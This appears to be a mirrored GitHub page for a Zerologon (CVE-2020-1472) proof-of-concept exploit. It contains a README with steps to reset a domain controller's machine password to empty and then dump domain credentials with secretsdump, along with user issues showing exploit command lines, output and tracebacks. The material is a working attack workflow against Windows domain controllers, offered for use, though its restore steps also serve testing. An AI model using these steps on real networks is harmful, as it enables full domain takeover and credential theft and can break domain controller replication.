dirkjanm / cve-2020-1472 Goto Github PK

PoC for Zerologon - all research credits go to Tom Tervoort of Secura

Python 100.00%

cve-2020-1472's Introduction

CVE-2020-1472 POC

Requires the latest impacket from GitHub with added netlogon structures.

Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this!

More info and original research here

Installing

Only works on Python 3.6 and newer! If your OS comes installed with impacket (such as Kali), make sure to remove all existing installations first. If you still get import errors after this, run it from a virtualenv or pipenv.

Exploit steps

Read the blog/whitepaper above so you know what you're doing
Run cve-2020-1472-exploit.py with IP and netbios name of DC
DCSync with secretsdump, using -just-dc and -no-pass or empty hashes and the DCHOSTNAME$ account

Restore steps

If you install a version of impacket from GitHub that was updated on or after September 15th 2020, secretsdump will automatically dump the plaintext machine password (hex encoded) when dumping the local registry secrets. Note that this is different from the DCSync, as DCSync uses the machine account, whereas dumping the registry requires you to execute secretsdump against the domain controller as a Domain Admin (such as the builtin Administrator account).

Alternatively on slightly older versions of secretsdump you can dump this same password by first extracting the registry hives and then running secretsdump offline (it will then always print the plaintext key because it can't calculate the Kerberos hashes).

With this plaintext password you can run restorepassword.py with the -hexpass parameter. This will first authenticate with the empty password to the same DC and then set the password back to the original one. Make sure you supply the netbios name and IP again as target, so for example:

python restorepassword.py testsegment/s2016dc@s2016dc -target-ip 192.168.222.113 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3...etc

cve-2020-1472's People

Contributors

Stargazers

Watchers

Forkers

hansesecure virgilcj kaulanab milo2012 mpgn kazimer ustayready htkcodes alainw68 notmedic larimda shantanu561993 w4ter y1zl pyking likescam co0ontty techris45 jessefmoore raystyle th815 victor0013 blacktrace a11en4 majl potats0 xhbuming akpotter wang1921 ashr b0bac m-planck thx0701 kyokk amingolala fairyming weizn11 clavoillotte polinload fdlucifer takijoe test123test111 canhld94 ltvthang kali-tom ith4cker jermainlaforce 1captainnemo1 zshell angrypapa geefonline wang0098 marcdowie ducnp me009 ki11uaa guokers liupanxuexi jr69ss hw-yan samuelriesz unprovable puzzlepeaches lwzsoviet crackercat skysliently sjpi atorninja kali3426 j0bkeeper aixueyou h1d3r itzdan siddharthkumar02 will-777 makedangdang minkione rishi-7861 roguesupport-scott vrirus theologu perseverance-1 we88c0de orfeous th3xace 0x413x4 icepaule sukelluskello hackmycontrolsystem ferranespigares gr3yr0n1n crashish baroncrowley gkfnf peterg75 cyberxml bbghunter aaroncaiii dm168168 inosec2

cve-2020-1472's Issues

No results running secretsdump.py

Hi!
First of all - thanks!
I have tried playing with the syntax after successfully running the exploit script but I'm unable to get any results from running secretsdump.py at the end

Is it something like this?
secretsdump.py -no-pass -just-dc <TARGET IP>

The output looks like this:

[*] Cleaning up...

Best regards,
Balackie

Error while restoring password

I get the following error and I'm not sure why:

impacket.dcerpc.v5.nrpc.DCERPCSessionError: NRPC SessionError: code: 0xc000018b - STATUS_NO_TRUST_SAM_ACCOUNT - The SAM database on the Windows Server does not have a computer account for this workstation trust relationship.

The command I'm running:

python3.7 restorepassword.py <NetBIOS name> -target-ip <IP> -hexpass <hexpass>

My OS: Linux
DC OS: Windows Server 2016

modify secretsdump.py to print hex values

The linked code is not working, the current releases didn't containing the reffered line.
Can you please post a working method to print the hex via secretsdump?
Thanks!

socket.gaierror: [Errno -2] Name or service not known

When running the restorepassword.py script I have this error socket.gaierror: [Errno -2] Name or service not known

⋊> ~/T/CVE-2020-1472 on master ⨯ python3 cve-2020-1472-exploit.py WIN-NP8JD7IHCC5 192.168.0.104                                                  10:12:29
Performing authentication attempts...
==========================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!



⋊> ~/T/CVE-2020-1472 on master ⨯ python3 restorepassword.py poudlard.wizard/WIN-NP8JD7IHCC5@WIN-NP8JD7IHCC5 -hexpass xxxxxx
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation
 
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation

 

Traceback (most recent call last):
  File "restorepassword.py", line 150, in <module>
    action.dump(remoteName, options.target_ip)
  File "restorepassword.py", line 48, in dump
    stringbinding = epm.hept_map(remoteName, nrpc.MSRPC_UUID_NRPC, protocol = 'ncacn_ip_tcp')
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/epm.py", line 1256, in hept_map
    dce.connect()
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
    return self._transport.connect()
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/transport.py", line 342, in connect
    af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_STREAM)[0]
  File "/usr/lib/python3.8/socket.py", line 918, in getaddrinfo
    for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno -2] Name or service not known

python37 attack fail

client: python37, windows 2008 R2, server: windows 2012 DC, encounter error: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2', this might have been caused by invalid arguments or network error。 how to resolve?

Does not work with python 2 and 3.5

I have installed the latest IMPACKET and also ran the python script i get the below error :

python cve-2020-1472-exploit.py ba.local 192.168.75.131
File "cve-2020-1472-exploit.py", line 16
print(msg, file=sys.stderr)

I can ping the DC :

root@kali:~/AD-cve/CVE-2020-1472# ping 192.168.75.131
PING 192.168.75.131 (192.168.75.131) 56(84) bytes of data.
64 bytes from 192.168.75.131: icmp_seq=1 ttl=128 time=0.584 ms
64 bytes from 192.168.75.131: icmp_seq=2 ttl=128 time=0.300 ms

Any idea ? Thank you in advance

close

Question - isn't it supposed to clear password? Successful however I can still login to DC. Host that I am executing script is not tied to victim DC, may be that is the problem.

Restore Steps

Can you provide an example of how to use secretsdump.py to dump the plaintext machine password? I see that the restorepassword.py needs the hexpass, but I can not figure out how to get that.

Thanks

AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'

Performing authentication attempts...

Target vulnerable, changing account password to empty string
Traceback (most recent call last):
File "./cve-2020-1472-exploit.py", line 106, in
perform_attack('\\' + dc_name, dc_ip, dc_name)
File "./cve-2020-1472-exploit.py", line 84, in perform_attack
result = exploit(dc_handle, rpc_con, target_computer)
File "./cve-2020-1472-exploit.py", line 57, in exploit
request = nrpc.NetrServerPasswordSet2()
AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'